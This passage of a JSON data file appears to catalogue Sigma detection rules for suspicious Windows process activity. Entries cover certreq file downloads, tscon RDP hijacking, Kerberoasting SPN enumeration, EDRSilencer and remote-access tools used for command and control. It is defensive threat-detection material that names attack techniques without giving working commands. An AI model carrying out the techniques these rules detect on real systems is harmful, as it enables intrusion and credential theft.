"https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/", "https://medium.com/@cyberjyot/lolbin-execution-via-diskshadow-f6ff681a27a4", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_diskshadow_script_mode_susp_ext.yml" ], "tags": [ "attack.defense-evasion", 
"attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1dde5376-a648-492e-9e54-4241dd9b0c7f", "value": "Diskshadow Script Mode - Uncommon Script Extension Execution" }, { "description": "Detects a suspicious RDP session redirect using tscon.exe", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2018-03-17", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_tscon_rdp_redirect.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html", "https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6", "https://www.hackingarticles.in/rdp-session-hijacking-with-tscon/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tscon_rdp_redirect.yml" ], "tags": [ "attack.lateral-movement", "attack.t1563.002", "attack.t1021.001", "car.2013-07-002" ] }, "related": [ { "dest-uuid": "e0033c16-a07e-48aa-8204-7c3ca669998c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "eb062747-2193-45de-8fa2-e62549c37ddf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f72aa3e8-49f9-4c7d-bd74-f8ab84ff9bbb", "value": "Suspicious RDP Redirect Using TSCON" }, { "description": "Detects a suspicious output redirection to the local admins share, this technique is often found in malicious scripts or hacktool stagers", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-01-16", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_redirect_local_admin_share.yml", "level": "high", "logsource.category": 
"process_creation", "logsource.product": "windows", "refs": [ "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", "https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_redirect_local_admin_share.yml" ], "tags": [ "attack.exfiltration", "attack.t1048" ] }, "related": [ { "dest-uuid": "a19e86f8-1c0a-4fea-8407-23b73d615776", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ab9e3b40-0c85-4ba1-aede-455d226fd124", "value": "Suspicious Redirection to Local Admin Share" }, { "description": "Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions.", "meta": { "author": "@ROxPinTeddy", "creation_date": "2020-05-12", "falsepositive": [ "Legitimate use of Winrar command line version", "Other command line tools, that use these flags" ], "filename": "proc_creation_win_rar_compression_with_password.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://ss64.com/bash/rar.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", "https://labs.sentinelone.com/the-anatomy-of-an-apt-attack-and-cobaltstrike-beacons-encoded-configuration/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rar_compression_with_password.yml" ], "tags": [ "attack.collection", "attack.t1560.001" ] }, "related": [ { "dest-uuid": "00f90846-cbd1-4fc5-9233-df5c2bf2a662", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "faa48cae-6b25-4f00-a094-08947fef582f", "value": "Rar Usage with Password and Compression Level" }, { 
"description": "Detects usage of the \"Add-WindowsCapability\" cmdlet to add Windows capabilities. Notable capabilities could be \"OpenSSH\" and others.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-22", "falsepositive": [ "Legitimate usage of the capabilities by administrators or users. Add additional filters accordingly." ], "filename": "proc_creation_win_powershell_add_windows_capability.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.virustotal.com/gui/file/af1c82237b6e5a3a7cdbad82cc498d298c67845d92971bada450023d1335e267/content", "https://learn.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse?tabs=powershell", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_add_windows_capability.yml" ], "tags": [ "attack.execution" ] }, "uuid": "b36d01a3-ddaf-4804-be18-18a6247adfcd", "value": "Add Windows Capability Via PowerShell Cmdlet" }, { "description": "Detects a suspicious certreq execution taken from the LOLBAS examples, which can be abused to download (small) files", "meta": { "author": "Christian Burkard (Nextron Systems)", "creation_date": "2021-11-24", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_lolbin_susp_certreq_download.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Certreq/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_certreq_download.yml" ], "tags": [ "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4480827a-9799-4232-b2c4-ccc6c4e9e12b", "value": "Suspicious Certreq Command to 
Download" }, { "description": "Detects service principal name (SPN) enumeration used for Kerberoasting", "meta": { "author": "Markus Neis, keepwatch", "creation_date": "2018-11-14", "falsepositive": [ "Administration activity" ], "filename": "proc_creation_win_setspn_spn_enumeration.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.praetorian.com/blog/how-to-use-kerberoasting-t1208-for-privilege-escalation/?edition=2019", "https://web.archive.org/web/20200329173843/https://p16.praetorian.com/blog/how-to-use-kerberoasting-t1208-for-privilege-escalation", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_setspn_spn_enumeration.yml" ], "tags": [ "attack.credential-access", "attack.t1558.003" ] }, "related": [ { "dest-uuid": "f2877f7f-9a4c-4251-879f-1224e3006bee", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1eeed653-dbc8-4187-ad0c-eeebb20e6599", "value": "Potential SPN Enumeration Via Setspn.EXE" }, { "description": "Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags\n", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-02-26", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wuauclt_no_cli_flags_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://redcanary.com/blog/blackbyte-ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wuauclt_no_cli_flags_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036" ] }, "related": [ { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "52d097e2-063e-4c9c-8fbb-855c8948d135", 
"value": "Suspicious Windows Update Agent Empty Cmdline" }, { "description": "Detects creation of a new service (kernel driver) with the type \"kernel\"", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-14", "falsepositive": [ "Rare legitimate installation of kernel drivers via sc.exe" ], "filename": "proc_creation_win_sc_new_kernel_driver.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.aon.com/cyber-solutions/aon_cyber_labs/yours-truly-signed-av-driver-weaponizing-an-antivirus-driver/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_new_kernel_driver.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1543.003" ] }, "related": [ { "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "431a1fdb-4799-4f3b-91c3-a683b003fc49", "value": "New Kernel Driver Via SC.EXE" }, { "description": "Detects when a mounted share is removed. 
Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation", "meta": { "author": "oscd.community, @redcanary, Zach Stanford @svch0st", "creation_date": "2020-10-08", "falsepositive": [ "Administrators or Power users may remove their shares via cmd line" ], "filename": "proc_creation_win_net_share_unmount.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_share_unmount.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070.005" ] }, "related": [ { "dest-uuid": "a750a9f6-0bde-4bb3-9aae-1e2786e9780c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cb7c4a03-2871-43c0-9bbb-18bbdb079896", "value": "Unmount Share Via Net.EXE" }, { "description": "Detects use of chcp to look up the system locale value as part of host discovery", "meta": { "author": "_pete_0, TheDFIRReport", "creation_date": "2022-02-21", "falsepositive": [ "During Anaconda update the 'conda.exe' process will eventually execute the 'chcp' command.", "Discord was seen using chcp to look up code pages" ], "filename": "proc_creation_win_chcp_codepage_lookup.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/chcp", "https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_chcp_codepage_lookup.yml" ], "tags": [ "attack.discovery", "attack.t1614.001" ] }, "related": [ { "dest-uuid": "c1b68a96-3c48-49ea-a6c0-9b27359f9c19", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7090adee-82e2-4269-bd59-80691e7c6338", "value": "Console CodePage Lookup Via CHCP" }, { "description": "Detects the execution of EDRSilencer, a tool that leverages Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server based on PE metadata information.\n", "meta": { "author": "@gott_cyber", "creation_date": "2024-01-02", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_hktl_edrsilencer.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/netero1010/EDRSilencer", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_edrsilencer.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562" ] }, "related": [ { "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "eb2d07d4-49cb-4523-801a-da002df36602", "value": "HackTool - EDRSilencer Execution" }, { "description": "Detects the use of iexpress.exe to create binaries via Self Extraction Directive (SED) files located in potentially suspicious locations.\nThis behavior has been observed in-the-wild by different threat actors.\n", "meta": { "author": "Joseliyo Sanchez, @Joseliyo_Jstnk, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2024-02-05", "falsepositive": [ "Administrators building packages using iexpress.exe" ], "filename": "proc_creation_win_iexpress_susp_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://strontic.github.io/xcyclopedia/library/iexpress.exe-D594B2A33EFAFD0EABF09E3FDC05FCEA.html", "https://www.virustotal.com/gui/file/602f4ae507fa8de57ada079adff25a6c2a899bd25cd092d0af7e62cdb619c93c/behavior", 
"https://decoded.avast.io/janvojtesek/raspberry-robins-roshtyak-a-little-lesson-in-trickery/", "https://en.wikipedia.org/wiki/IExpress", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iexpress_susp_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b2b048b0-7857-4380-b0fb-d3f0ab820b71", "value": "Self Extracting Package Creation Via Iexpress.EXE From Potentially Suspicious Location" }, { "description": "Detects usage of the netsh command to open and allow connections to port 3389 (RDP). As seen used by Sarwent Malware", "meta": { "author": "Sander Wiebing", "creation_date": "2020-05-23", "falsepositive": [ "Legitimate administration activity" ], "filename": "proc_creation_win_netsh_fw_allow_rdp.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://labs.sentinelone.com/sarwent-malware-updates-command-detonation/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_allow_rdp.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.004" ] }, "related": [ { "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "01aeb693-138d-49d2-9403-c4f52d7d3d62", "value": "RDP Connection Allowed Via Netsh.EXE" }, { "description": "Detects a suspicious child process of a Microsoft HTML Help (HH.exe)", "meta": { "author": "Maxim Pavlunin, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2020-04-01", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hh_html_help_susp_child_process.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ 
"https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37", "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/chm-badness-delivers-a-banking-trojan/", "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/", "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-27939090904026cc396b0b629c8e4314acd6f5dac40a676edbc87f4567b47eb7", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hh_html_help_susp_child_process.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.initial-access", "attack.t1047", "attack.t1059.001", "attack.t1059.003", "attack.t1059.005", "attack.t1059.007", "attack.t1218", "attack.t1218.001", "attack.t1218.010", "attack.t1218.011", "attack.t1566", "attack.t1566.001" ] }, "related": [ { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "a6937325-9321-4e2e-bb2b-3ed2d40b2a9d", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "a62a8db3-f23a-4d8f-afd6-9dbc77e7813b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "2e34237d-8574-43f6-aace-ae2915de8597", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "52cad028-0ff0-4854-8f67-d25dfcbc78b4", "value": "HTML Help HH.EXE Suspicious Child Process" }, { "description": "Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-11-10", "falsepositive": [ "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" ], "filename": "proc_creation_win_powershell_computer_discovery_get_adcomputer.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", "https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf", "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_computer_discovery_get_adcomputer.yml" ], "tags": [ "attack.discovery", "attack.t1033" ] }, "related": [ { 
"dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "435e10e4-992a-4281-96f3-38b11106adde", "value": "Computer Discovery And Export Via Get-ADComputer Cmdlet" }, { "description": "Detects a suspicious process spawning from an \"mshta.exe\" process, which could be indicative of a malicious HTA script execution", "meta": { "author": "Michael Haag", "creation_date": "2019-01-16", "falsepositive": [ "Printer software / driver installations", "HP software" ], "filename": "proc_creation_win_mshta_susp_child_processes.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.trustedsec.com/july-2015/malicious-htas/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mshta_susp_child_processes.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.005", "car.2013-02-003", "car.2013-03-001", "car.2014-04-003" ] }, "related": [ { "dest-uuid": "840a987a-99bd-4a80-a5c9-0cb2baa6cade", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "03cc0c25-389f-4bf8-b48d-11878079f1ca", "value": "Suspicious MSHTA Child Process" }, { "description": "Detects the use of the PhoneDeepLink parameter to potentially sideload a DLL file that does not exist. 
This non-existent DLL file is named \"ShellChromeAPI.dll\".\nAdversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter\n", "meta": { "author": "@gott_cyber", "creation_date": "2022-08-29", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_deviceenroller_dll_sideloading.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://mobile.twitter.com/0gtweet/status/1564131230941122561", "https://strontic.github.io/xcyclopedia/library/DeviceEnroller.exe-24BEF0D6B0ECED36BB41831759FDE18D.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_deviceenroller_dll_sideloading.yml" ], "tags": [ "attack.defense-evasion", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e173ad47-4388-4012-ae62-bd13f71c18a8", "value": "Potential DLL Sideloading Via DeviceEnroller.EXE" }, { "description": "Detects the installation of VsCode tunnel (code-tunnel) as a service.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-10-25", "falsepositive": [ "Legitimate installation of code-tunnel as a service" ], "filename": "proc_creation_win_vscode_tunnel_service_install.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://code.visualstudio.com/docs/remote/tunnels", "https://badoption.eu/blog/2023/01/31/code_c2.html", "https://ipfyx.fr/post/visual-studio-code-tunnel/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vscode_tunnel_service_install.yml" ], "tags": [ "attack.command-and-control", "attack.t1071.001" ] }, "related": [ { "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "30bf1789-379d-4fdc-900f-55cd0a90a801", "value": "Visual Studio Code Tunnel Service Installation" }, { "description": "Detects the execution of a renamed \"PingCastle\" binary based on the PE metadata fields.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)", "creation_date": "2024-01-11", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_renamed_pingcastle.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.pingcastle.com/documentation/scanner/", "https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_pingcastle.yml" ], "tags": [ "attack.execution", "attack.t1059", "attack.defense-evasion", "attack.t1202" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2433a154-bb3d-42e4-86c3-a26bdac91c45", "value": "Renamed PingCastle Binary Execution" }, { "description": "Attackers may leverage fsutil to enumerate connected drives.", "meta": { "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", "creation_date": "2022-03-29", "falsepositive": [ "Certain software or administrative tasks may trigger false positives." 
], "filename": "proc_creation_win_fsutil_drive_enumeration.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/discovery_peripheral_device.toml", "Turla has used fsutil fsinfo drives to list connected drives.", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_fsutil_drive_enumeration.yml" ], "tags": [ "attack.discovery", "attack.t1120" ] }, "related": [ { "dest-uuid": "348f1eef-964b-4eb6-bb53-69b3dcb0c643", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "63de06b9-a385-40b5-8b32-73f2b9ef84b6", "value": "Fsutil Drive Enumeration" }, { "description": "Detects command line parameters used by Bloodhound and Sharphound hack tools", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2019-12-20", "falsepositive": [ "Other programs that use these command line options and accept an 'All' parameter" ], "filename": "proc_creation_win_hktl_bloodhound_sharphound.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/BloodHoundAD/BloodHound", "https://github.com/BloodHoundAD/SharpHound", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_bloodhound_sharphound.yml" ], "tags": [ "attack.discovery", "attack.t1087.001", "attack.t1087.002", "attack.t1482", "attack.t1069.001", "attack.t1069.002", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "25659dd6-ea12-45c4-97e6-381e3e4b593e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "21875073-b0ee-49e3-9077-1e2a885359af", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": 
"767dbf9e-df3f-45cb-8998-4903ab5f80c0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "a01bf75f-00b2-4568-a58f-565ff9bf202b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "2aed01ad-3df3-4410-a8cb-11ea4ded587c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f376c8a7-a2d0-4ddc-aa0c-16c17236d962", "value": "HackTool - Bloodhound/Sharphound Execution" }, { "description": "Detects the execution of the PUA/Recon tool Seatbelt via PE information of command line parameters", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-10-18", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_pua_seatbelt.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/GhostPack/Seatbelt", "https://www.bluetangle.dev/2022/08/fastening-seatbelt-on-threat-hunting.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_seatbelt.yml" ], "tags": [ "attack.discovery", "attack.t1526", "attack.t1087", "attack.t1083" ] }, "related": [ { "dest-uuid": "e24fcba8-2557-4442-a139-1ee2f2e784db", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "38646daa-e78f-4ace-9de0-55547b2d30da", "value": "PUA - Seatbelt 
Execution" }, { "description": "Detects execution of Windows Problem Steps Recorder (psr.exe), a utility used to record the user screen and clicks.", "meta": { "author": "Beyu Denis, oscd.community", "creation_date": "2019-10-12", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_psr_capture_screenshots.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", "https://web.archive.org/web/20200229201156/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1493861893.pdf", "https://lolbas-project.github.io/lolbas/Binaries/Psr/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_psr_capture_screenshots.yml" ], "tags": [ "attack.collection", "attack.t1113" ] }, "related": [ { "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2158f96f-43c2-43cb-952a-ab4580f32382", "value": "Screen Capture Activity Via Psr.EXE" }, { "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.", "meta": { "author": "frack113", "creation_date": "2021-12-10", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_net_use_network_connections_discovery.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-1---system-network-connections-discovery", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_use_network_connections_discovery.yml" ], "tags": [ 
"attack.discovery", "attack.t1049" ] }, "related": [ { "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1c67a717-32ba-409b-a45d-0fb704a73a81", "value": "System Network Connections Discovery Via Net.EXE" }, { "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", "meta": { "author": "frack113", "creation_date": "2022-02-13", "falsepositive": [ "Legitimate usage of the tool" ], "filename": "proc_creation_win_remote_access_tools_screenconnect.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-5---screenconnect-application-download-and-install-on-windows", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_screenconnect.yml" ], "tags": [ "attack.command-and-control", "attack.t1219" ] }, "related": [ { "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "57bff678-25d1-4d6c-8211-8ca106d12053", "value": "Remote Access Tool - ScreenConnect Execution" }, { "description": "Detects the creation of a process via the Windows task manager. 
